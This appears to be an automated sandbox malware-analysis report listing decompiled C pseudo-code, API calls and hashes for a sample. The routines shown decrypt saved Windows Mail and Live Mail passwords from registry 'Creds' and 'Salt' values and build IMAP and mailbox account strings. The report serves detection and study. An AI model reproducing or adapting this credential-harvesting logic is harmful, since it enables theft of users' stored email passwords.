                                                                                									L004115B2();
                                                                                									if(__eax != 0) {
                                                                                										_push("/skeepass");
                                                                                										L004115C4();
                                                                                										asm("sbb eax, eax");
                                                                                										return ( ~__eax & 0xfffffff8) + 8;
                                                                                									} else {
                                                                                										_t5 = 3;
                                                                                										return _t5;
                                                                                									}
                                                                                								} else {
                                                                                									_t6 = 7;
                                                                                									return _t6;
                                                                                								}
                                                                                							} else {
                                                                                								_t7 = 2;
                                                                                								return _t7;
                                                                                							}
                                                                                						} else {
                                                                                							_t8 = 6;
                                                                                							return _t8;
                                                                                						}
                                                                                					} else {
                                                                                						_t9 = 5;
                                                                                						return _t9;
                                                                                					}
                                                                                				} else {
                                                                                					_t10 = 4;
                                                                                					return _t10;
                                                                                				}
                                                                                			}










                                                                                APIs
                                                                                • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 2884411883-1959339147
                                                                                • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				void _v515;
                                                                                				char _v516;
                                                                                				void _v771;
                                                                                				char _v772;
                                                                                				void _v1027;
                                                                                				char _v1028;
                                                                                				char _v1284;
                                                                                				char _v2308;
                                                                                				char _t47;
                                                                                				intOrPtr* _t50;
                                                                                				void* _t57;
                                                                                				intOrPtr* _t73;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				void* _t79;
                                                                                
                                                                                				_v1028 = 0;
                                                                                				memset( &_v1027, 0, 0xfe);
                                                                                				_v772 = 0;
                                                                                				memset( &_v771, 0, 0xfe);
                                                                                				_v516 = 0;
                                                                                				memset( &_v515, 0, 0xfe);
                                                                                				_t77 = _t76 + 0x24;
                                                                                				if(_a16 != 0xffffffff) {
                                                                                					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
                                                                                					_t77 = _t77 + 0x14;
                                                                                				}
                                                                                				if(_a20 != 0xffffffff) {
                                                                                					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
                                                                                					strcpy( &_v516, "</font>");
                                                                                					_t77 = _t77 + 0x1c;
                                                                                				}
                                                                                				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                                                				E00405EFD(_a4,  &_v2308);
                                                                                				_t47 = _a12;
                                                                                				_t78 = _t77 + 0x14;
                                                                                				if(_t47 > 0) {
                                                                                					_t73 = _a8 + 4;
                                                                                					_a16 = _t47;
                                                                                					do {
                                                                                						_v260 = 0;
                                                                                						memset( &_v259, 0, 0xfe);
                                                                                						_t50 =  *_t73;
                                                                                						_t79 = _t78 + 0xc;
                                                                                						if( *_t50 == 0) {
                                                                                							_v260 = 0;
                                                                                						} else {
                                                                                							sprintf( &_v260, " width=\"%s\"", _t50);
                                                                                							_t79 = _t79 + 0xc;
                                                                                						}
                                                                                						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                                                						_t57 = E00405EFD(_a4,  &_v2308);
                                                                                						_t78 = _t79 + 0x20;
                                                                                						_t73 = _t73 + 8;
                                                                                						_t34 =  &_a16;
                                                                                						 *_t34 = _a16 - 1;
                                                                                					} while ( *_t34 != 0);
                                                                                					return _t57;
                                                                                				}
                                                                                				return _t47;
                                                                                			}






















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: sprintf$memset$strcpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 898937289-3842416460
                                                                                • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E0DA() {
                                                                                				void* _t1;
                                                                                				int _t2;
                                                                                				struct HINSTANCE__* _t4;
                                                                                
                                                                                				if( *0x417518 != 0) {
                                                                                					return _t1;
                                                                                				}
                                                                                				_t2 = LoadLibraryA("psapi.dll");
                                                                                				_t4 = _t2;
                                                                                				if(_t4 == 0) {
                                                                                					L10:
                                                                                					return _t2;
                                                                                				} else {
                                                                                					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                                                					 *0x416fec = _t2;
                                                                                					if(_t2 != 0) {
                                                                                						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                                						 *0x416fe4 = _t2;
                                                                                						if(_t2 != 0) {
                                                                                							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                                                							 *0x416fdc = _t2;
                                                                                							if(_t2 != 0) {
                                                                                								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                                								 *0x41710c = _t2;
                                                                                								if(_t2 != 0) {
                                                                                									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                                									 *0x416fe8 = _t2;
                                                                                									if(_t2 != 0) {
                                                                                										 *0x417518 = 1;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					if( *0x417518 == 0) {
                                                                                						_t2 = FreeLibrary(_t4);
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                			}







                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2449869053-232097475
                                                                                • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				int _v12;
                                                                                				intOrPtr _v16;
                                                                                				void* _v20;
                                                                                				short* _v24;
                                                                                				unsigned int _v28;
                                                                                				char* _v32;
                                                                                				int _v36;
                                                                                				intOrPtr _v40;
                                                                                				signed int _v44;
                                                                                				void _v299;
                                                                                				char _v300;
                                                                                				void _v555;
                                                                                				char _v556;
                                                                                				char _v1080;
                                                                                				void* __esi;
                                                                                				int _t56;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t64;
                                                                                				char _t92;
                                                                                				char* _t93;
                                                                                				void* _t100;
                                                                                				signed int _t102;
                                                                                				signed int _t107;
                                                                                				intOrPtr _t108;
                                                                                				void* _t113;
                                                                                
                                                                                				_t113 = __eflags;
                                                                                				_t100 = __edx;
                                                                                				_t93 = __eax;
                                                                                				E004046D7( &_v1080);
                                                                                				if(E004047A0( &_v1080, _t113) != 0) {
                                                                                					_t56 = strlen(_t93);
                                                                                					asm("cdq");
                                                                                					_t107 = _t56 - _t100 >> 1;
                                                                                					_t2 = _t107 + 1; // 0x1
                                                                                					_t58 = _t2;
                                                                                					L004115D0();
                                                                                					_t102 = 0;
                                                                                					_t96 = _t58;
                                                                                					_v16 = _t58;
                                                                                					if(_t107 > 0) {
                                                                                						do {
                                                                                							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                                                							_v7 = _t93[1 + _t102 * 2];
                                                                                							_v6 = 0;
                                                                                							_t92 = E00406512( &_v8);
                                                                                							_t96 = _v16;
                                                                                							 *((char*)(_t102 + _v16)) = _t92;
                                                                                							_t102 = _t102 + 1;
                                                                                						} while (_t102 < _t107);
                                                                                					}
                                                                                					_v556 = 0;
                                                                                					memset( &_v555, 0, 0xff);
                                                                                					_v12 = 0;
                                                                                					_v300 = 0;
                                                                                					memset( &_v299, 0, 0xfe);
                                                                                					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                                                					if(_t64 != 1) {
                                                                                						__eflags = _t64 - 2;
                                                                                						if(_t64 == 2) {
                                                                                							_push("Software\\Microsoft\\Windows Live Mail");
                                                                                							goto L7;
                                                                                						}
                                                                                					} else {
                                                                                						_push("Software\\Microsoft\\Windows Mail");
                                                                                						L7:
                                                                                						strcpy( &_v300, ??);
                                                                                						_pop(_t96);
                                                                                					}
                                                                                					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                                                						_v12 = 0xff;
                                                                                						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                                                						RegCloseKey(_v20);
                                                                                					}
                                                                                					_v40 = _v16;
                                                                                					_v36 = _v12;
                                                                                					_v32 =  &_v556;
                                                                                					_v44 = _t107;
                                                                                					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                                                						_t108 = _a8;
                                                                                						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                                                						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                                                						LocalFree(_v24);
                                                                                					}
                                                                                					_push(_v16);
                                                                                					L004115D6();
                                                                                				}
                                                                                				return E004047F1( &_v1080);
                                                                                 			}

                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • strlen.MSVCRT ref: 0041054C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                • memset.MSVCRT ref: 004105A8
                                                                                • memset.MSVCRT ref: 004105C5
                                                                                • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                  • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                Strings
                                                                                • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                • Salt, xrefs: 00410621
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                • API String ID: 1673043434-2687544566
                                                                                • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                                                • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                                                • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				void _v619;
                                                                                				char _v620;
                                                                                				void _v1231;
                                                                                				char _v1232;
                                                                                				void* __edi;
                                                                                				void* _t37;
                                                                                				void* _t53;
                                                                                				char* _t54;
                                                                                				intOrPtr _t60;
                                                                                				void* _t61;
                                                                                				char* _t62;
                                                                                				void* _t67;
                                                                                				intOrPtr _t84;
                                                                                				void* _t85;
                                                                                				intOrPtr _t87;
                                                                                				void* _t88;
                                                                                				void* _t89;
                                                                                
                                                                                				_t87 = _a4;
                                                                                				_t84 = __ecx;
                                                                                				_v8 = __ecx;
                                                                                				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                					_t37 = 0;
                                                                                				} else {
                                                                                					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                				}
                                                                                				_push(0xa);
                                                                                				_push("mailbox://");
                                                                                				_push(_t37);
                                                                                				L00411612();
                                                                                				_t89 = _t88 + 0xc;
                                                                                				if(_t37 == 0) {
                                                                                					L8:
                                                                                					_a4 = 0;
                                                                                					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                                                						while(1) {
                                                                                							_t85 = E0040D438(_a4, _t84 + 0x468);
                                                                                							_v620 = 0;
                                                                                							memset( &_v619, 0, 0x261);
                                                                                							_v1232 = 0;
                                                                                							memset( &_v1231, 0, 0x261);
                                                                                							_t17 = _t85 + 0x104; // 0x104
                                                                                							_t18 = _t85 + 0x204; // 0x204
                                                                                							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                							_t20 = _t85 + 0x104; // 0x104
                                                                                							_t21 = _t85 + 0x204; // 0x204
                                                                                							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                							_t53 = 0;
                                                                                							_t89 = _t89 + 0x38;
                                                                                							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                							}
                                                                                							_push(_t53);
                                                                                							_t54 =  &_v620;
                                                                                							_push(_t54);
                                                                                							L004115B2();
                                                                                							if(_t54 == 0) {
                                                                                								goto L17;
                                                                                							}
                                                                                							_t61 = 0;
                                                                                							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                							}
                                                                                							_push(_t61);
                                                                                							_t62 =  &_v1232;
                                                                                							_push(_t62);
                                                                                							L004115B2();
                                                                                							if(_t62 != 0) {
                                                                                								L18:
                                                                                								_a4 = _a4 + 1;
                                                                                								_t60 = _v8;
                                                                                								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                                                									_t84 = _t60;
                                                                                									continue;
                                                                                								} else {
                                                                                								}
                                                                                							} else {
                                                                                								goto L17;
                                                                                							}
                                                                                							goto L21;
                                                                                							L17:
                                                                                							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                                                								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
                                                                                							} else {
                                                                                								goto L18;
                                                                                							}
                                                                                							goto L21;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                						_t67 = 0;
                                                                                					} else {
                                                                                						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                					}
                                                                                					_push(7);
                                                                                					_push("imap://");
                                                                                					_push(_t67);
                                                                                					L00411612();
                                                                                					_t89 = _t89 + 0xc;
                                                                                					if(_t67 == 0) {
                                                                                						goto L8;
                                                                                					}
                                                                                				}
                                                                                				L21:
                                                                                				return 1;
                                                                                 			}
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cd09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cce4
                                                                                0x0040ccf2
                                                                                0x0040cd17
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ccf2
                                                                                0x0040cc23
                                                                                0x0040cbe2
                                                                                0x0040cbe5
                                                                                0x0040cbf1
                                                                                0x0040cbe7
                                                                                0x0040cbec
                                                                                0x0040cbec
                                                                                0x0040cbf3
                                                                                0x0040cbf5
                                                                                0x0040cbfa
                                                                                0x0040cbfb
                                                                                0x0040cc00
                                                                                0x0040cc05
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cc05
                                                                                0x0040cd1e
                                                                                0x0040cd24

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 4281260487-2229823034
                                                                                • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				void _v619;
                                                                                				char _v620;
                                                                                				void _v1231;
                                                                                				char _v1232;
                                                                                				void* __edi;
                                                                                				void* _t39;
                                                                                				void* _t55;
                                                                                				char* _t56;
                                                                                				intOrPtr _t62;
                                                                                				void* _t63;
                                                                                				char* _t64;
                                                                                				void* _t69;
                                                                                				intOrPtr _t89;
                                                                                				void* _t91;
                                                                                				intOrPtr _t94;
                                                                                				void* _t99;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                
                                                                                				_t100 = _t99 - 0x4cc;
                                                                                				_t94 = _a4;
                                                                                				_t89 = __ecx;
                                                                                				_v8 = __ecx;
                                                                                				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                                                					_t39 = 0;
                                                                                				} else {
                                                                                					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                				}
                                                                                				_push(0xa);
                                                                                				_push("mailbox://");
                                                                                				_push(_t39);
                                                                                				L00411612();
                                                                                				_t101 = _t100 + 0xc;
                                                                                				if(_t39 == 0) {
                                                                                					L9:
                                                                                					_a4 = 0;
                                                                                					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
                                                                                						while(1) {
                                                                                							_t91 = E0040D438(_a4, _t89 + 0x468);
                                                                                							_v620 = 0;
                                                                                							memset( &_v619, 0, 0x261);
                                                                                							_v1232 = 0;
                                                                                							memset( &_v1231, 0, 0x261);
                                                                                							_t17 = _t91 + 0x104; // 0x104
                                                                                							_t18 = _t91 + 0x204; // 0x204
                                                                                							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                							_t20 = _t91 + 0x104; // 0x104
                                                                                							_t21 = _t91 + 0x204; // 0x204
                                                                                							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                							_t55 = 0;
                                                                                							_t101 = _t101 + 0x38;
                                                                                							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                                                								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                							}
                                                                                							_push(_t55);
                                                                                							_t56 =  &_v620;
                                                                                							_push(_t56);
                                                                                							L004115B2();
                                                                                							if(_t56 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							_t63 = 0;
                                                                                							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                                                								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                							}
                                                                                							_push(_t63);
                                                                                							_t64 =  &_v1232;
                                                                                							_push(_t64);
                                                                                							L004115B2();
                                                                                							if(_t64 != 0) {
                                                                                								L19:
                                                                                								_a4 = _a4 + 1;
                                                                                								_t62 = _v8;
                                                                                								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
                                                                                									_t89 = _t62;
                                                                                									continue;
                                                                                								} else {
                                                                                								}
                                                                                							} else {
                                                                                								goto L18;
                                                                                							}
                                                                                							goto L22;
                                                                                							L18:
                                                                                							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
                                                                                								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
                                                                                							} else {
                                                                                								goto L19;
                                                                                							}
                                                                                							goto L22;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                                                						_t69 = 0;
                                                                                					} else {
                                                                                						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                					}
                                                                                					_push(7);
                                                                                					_push("imap://");
                                                                                					_push(_t69);
                                                                                					L00411612();
                                                                                					_t101 = _t101 + 0xc;
                                                                                					if(_t69 == 0) {
                                                                                						goto L9;
                                                                                					}
                                                                                				}
                                                                                				L22:
                                                                                				return 1;
                                                                                			}























                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 2822975062-2229823034
                                                                                • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 56%
                                                                                			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				void* _v16;
                                                                                				short* _v20;
                                                                                				int _v24;
                                                                                				char* _v28;
                                                                                				char _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v40;
                                                                                				int _v44;
                                                                                				void _v299;
                                                                                				char _v300;
                                                                                				char _v556;
                                                                                				char _v812;
                                                                                				char _v4908;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				long _t46;
                                                                                				int* _t84;
                                                                                				char* _t85;
                                                                                
                                                                                				E004118A0(0x132c, __ecx);
                                                                                				_t84 = 0;
                                                                                				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
                                                                                				if(_t46 != 0) {
                                                                                					return _t46;
                                                                                				}
                                                                                				_v300 = _t46;
                                                                                				memset( &_v299, 0, 0xff);
                                                                                				_push(0xff);
                                                                                				_push( &_v300);
                                                                                				_v8 = 0;
                                                                                				_push(0);
                                                                                				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                                                					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                                                						_v12 = 0x1000;
                                                                                						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                                                							_v32 = _v12;
                                                                                							_v28 =  &_v4908;
                                                                                							_v40 = _a12;
                                                                                							_v36 = _a8;
                                                                                							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                                                								_t85 =  &_v812;
                                                                                								_v812 = 0;
                                                                                								_v556 = 0;
                                                                                								E004060D0(0xff, _t85,  &_v300);
                                                                                								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                                                								 *((intOrPtr*)( *_a4))(_t85);
                                                                                								LocalFree(_v20);
                                                                                								_t84 = 0;
                                                                                							}
                                                                                						}
                                                                                						RegCloseKey(_v16);
                                                                                					}
                                                                                					_v8 = _v8 + 1;
                                                                                					_push(0xff);
                                                                                					_push( &_v300);
                                                                                					_push(_v8);
                                                                                				}
                                                                                				return RegCloseKey(_a16);
                                                                                			}
























                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                • memset.MSVCRT ref: 0040D743
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                • API String ID: 551151806-1288872324
                                                                                • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
